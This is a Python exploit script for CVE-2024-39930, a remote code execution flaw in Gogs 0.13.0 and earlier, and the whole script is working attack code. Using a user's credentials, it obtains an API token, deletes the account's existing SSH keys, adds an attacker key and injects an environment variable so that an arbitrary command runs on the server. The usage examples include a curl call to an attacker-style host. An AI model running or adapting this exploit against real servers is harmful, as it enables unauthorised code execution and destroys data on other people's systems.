# Exploit Title: gogs 0.13.0 - Remote Code Execution (RCE)
# Date: 27th June, 2025
# Exploit Author: Ardayfio Samuel Nii Aryee
# Software link: https://github.com/gogs/gogs.git
# Version: gogs <=0.13.0
# Tested on: Ubuntu
# CVE: CVE-2024-39930
# ===============================
# Example Usage:
# python3 exploit.py http://gogs.local:3000 alice:password123 ~/.ssh/id_rsa ~/.ssh/id_rsa.pub "touch /tmp/pwned"
# python3 exploit.py http://gogs.local:3000 alice:password123 ~/.ssh/id_rsa ~/.ssh/id_rsa.pub "curl http://atacker.com" --ssh-port 2222
# ===============================
import requests
import paramiko
import base64
import random
import string
import sys
import argparse
from urllib.parse import urlparse
API_BASE_URL = ""
def generate_random_string(length=8, charset=None):
if charset is None:
charset = string.ascii_letters + string.digits
return ''.join(random.choices(charset, k=length))
def make_headers(token=None, basic_auth=None):
headers = {"Content-Type": "application/json"}
if token:
headers["Authorization"] = f"token {token}"
elif basic_auth:
b64 = base64.b64encode(basic_auth.encode()).decode()
headers["Authorization"] = f"Basic {b64}"
return headers
def http_post(path, json=None, headers=None):
url = f"{API_BASE_URL}{path}"
response = requests.post(url, json=json, headers=headers)
response.raise_for_status()
return response
def http_get(path, headers=None):
url = f"{API_BASE_URL}{path}"
response = requests.get(url, headers=headers)
response.raise_for_status()
return response
def http_delete(path, headers=None):
url = f"{API_BASE_URL}{path}"
response = requests.delete(url, headers=headers)
response.raise_for_status()
return response
def obtain_api_token(username, password):
auth = f"{username}:{password}"
headers = make_headers(basic_auth=auth)
data = {"name": generate_random_string()}
try:
response = http_post(f"/users/{username}/tokens", json=data, headers=headers)
token = response.json()['sha1']
print(f"[+] API Token Acquired: {token}")
return token
except Exception as e:
print(f"[!] Failed to obtain API token: {e}")
sys.exit(1)
def create_repo(token):
repo_name = generate_random_string()
headers = make_headers(token=token)
data = {
"name": repo_name,
"description": "Auto-created repository",
"private": False
}
try:
response = http_post("/user/repos", json=data, headers=headers)
full_name = response.json()['full_name']
print(f"[+] Repository Created: {full_name}")
return full_name
except Exception as e:
print(f"[!] Failed to create repository: {e}")
sys.exit(1)
def delete_existing_ssh_keys(token):
headers = make_headers(token=token)
try:
response = http_get("/user/keys", headers=headers)
keys = response.json()
for key in keys:
key_id = key['id']
http_delete(f"/user/keys/{key_id}", headers=headers)
print(f"[+] Deleted SSH Key ID: {key_id}")
except Exception as e:
print(f"[!] Failed to delete existing SSH keys: {e}")
sys.exit(1)
def add_ssh_key(public_key_path, token):
delete_existing_ssh_keys(token)
try:
with open(public_key_path, 'r') as f:
key = f.read()
except Exception as e:
print(f"[!] Failed to read public key file: {e}")
sys.exit(1)
headers = make_headers(token=token)
data = {
"title": generate_random_string(),
"key": key
}
try:
response = http_post("/user/keys", json=data, headers=headers)
print(f"[+] SSH Key Added: {response.status_code}")
except Exception as e:
print(f"[!] Failed to add SSH key: {e}")
sys.exit(1)
def exploit(ssh_user, ssh_host, ssh_port, private_key_path, repo_path, command):
try:
key = paramiko.RSAKey.from_private_key_file(private_key_path)
except Exception as e:
print(f"[!] Failed to load SSH key: {e}")
sys.exit(1)
try:
client = paramiko.SSHClient()
client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
client.connect(hostname=ssh_host, port=int(ssh_port), username=ssh_user, pkey=key)
session = client.get_transport().open_session()
print("[+] Executing command...... ")
session.set_environment_variable("--split-string", command)
session.exec_command(f"git-upload-pack {repo_path}")
stdout = session.makefile('rb', 1024)
stderr = session.makefile_stderr('rb', 1024)
print("STDERR:", stderr.read().decode())
print("STDOUT:", stdout.read().decode())
session.close()
client.close()
except Exception as e:
print(f"[!] Error: {e}")
sys.exit(1)
def main():
global API_BASE_URL
parser = argparse.ArgumentParser(description="Exploit Gogs SSH argument injection (CVE-2024-39930)")
parser.add_argument("url", help="Gogs application URL (e.g., http://skillforge.lab:3000)")
parser.add_argument("auth", help="Gogs credentials in the format username:password")
parser.add_argument("private_key", help="Path to private SSH key")
parser.add_argument("public_key", help="Path to public SSH key")
parser.add_argument("command", help="Command to execute remotely")
parser.add_argument("--ssh-port", type=int, default=None, help="Optional: custom SSH port to use")
args = parser.parse_args()
parsed_url = urlparse(args.url)
API_BASE_URL = f"{parsed_url.scheme}://{parsed_url.netloc}/api/v1"
ssh_host = parsed_url.hostname
ssh_port = args.ssh_port if args.ssh_port else (parsed_url.port or 22)
try:
username, password = args.auth.split(":")
except ValueError:
print("[!] Invalid format for auth argument")
sys.exit(1)
token = obtain_api_token(username, password)
repo_path = create_repo(token)
add_ssh_key(args.public_key, token)
exploit(
ssh_user=username,
ssh_host=ssh_host,
ssh_port=ssh_port,
private_key_path=args.private_key,
repo_path=repo_path,
command=args.command
)
if __name__ == "__main__":
main()
